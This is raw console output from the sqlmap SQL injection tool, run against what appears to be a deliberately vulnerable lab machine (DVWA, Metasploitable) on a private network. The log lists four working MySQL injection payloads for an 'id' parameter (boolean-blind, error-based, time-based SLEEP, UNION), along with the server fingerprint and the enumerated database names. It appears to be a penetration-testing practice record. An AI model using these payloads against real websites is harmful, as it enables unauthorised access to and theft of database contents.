        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:53:56 /2026-02-15/

[04:53:56] [INFO] resuming back-end DBMS 'mysql' 
[04:53:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (7122=7122) THEN 1 ELSE (SELECT 2676 UNION SELECT 1857) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND ROW(9724,5771)>(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT (ELT(9724=9724,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM (SELECT 9724 UNION SELECT 3241 UNION SELECT 3873 UNION SELECT 6130)a GROUP BY x)&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 7620 FROM (SELECT(SLEEP(5)))thAF)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x716a766a71,0x6f54516e4672786764424656576d4e6769645a766c53757054507347784b4d567a72666775555663,0x717a717171)-- -&Submit=Submit
---
[04:53:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 4.1
[04:53:56] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[04:53:56] [INFO] fetched data logged to text files under '/home/maq/snap/code/223/.local/share/sqlmap/output/192.168.56.101'
[04:53:56] [WARNING] your sqlmap version is outdated

[*] ending @ 04:53:56 /2026-02-15/

